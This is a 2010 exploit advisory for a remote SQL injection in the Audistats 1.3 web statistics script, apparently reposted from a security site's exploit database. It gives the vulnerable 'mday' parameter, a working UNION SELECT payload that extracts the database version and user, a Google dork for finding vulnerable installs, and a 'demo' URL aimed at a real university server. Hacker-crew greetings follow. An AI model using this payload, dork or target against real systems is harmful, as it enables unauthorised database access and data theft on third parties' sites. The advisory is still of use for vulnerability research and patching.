Audistats 1.3 remote SQL injection

Text :

###########################################################################
########

#
[~] Audistats SQL injection vulnerability - (mday)
#
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
#
[~] Homepage : http://www.indonesiancoder.com
#
[~] Date : January 29, 2010
#

#
###########################################################################
########

[ Software Information ]

[+] Vendor : http://adubus.free.fr/audistat/
[+] Download : http://adubus.free.fr/audistat/
[+] version : 1.3 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -
[+] Location : INDONESIA - JOGJA

###########################################################################
#######

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/?year=kaMtiEz&month=tukulesto&mday=[INDO
NESIANCODER]

[ Exploit ]

-666+union+all+select+@@version,user()--

[ Demo ]

http://dirac.phys.ncku.edu.tw/stats/?year=kaMtiEz&month=tukulesto&m
day=-15+union+all+select+@@version,user()--

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+]
tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzh
ack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck

[ NOTE ]

[+] Belajar Belajar Dan Belajar !!
[+] Jack im commiinnggggggggggggggggggggggggggggggggg .. ^_^

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason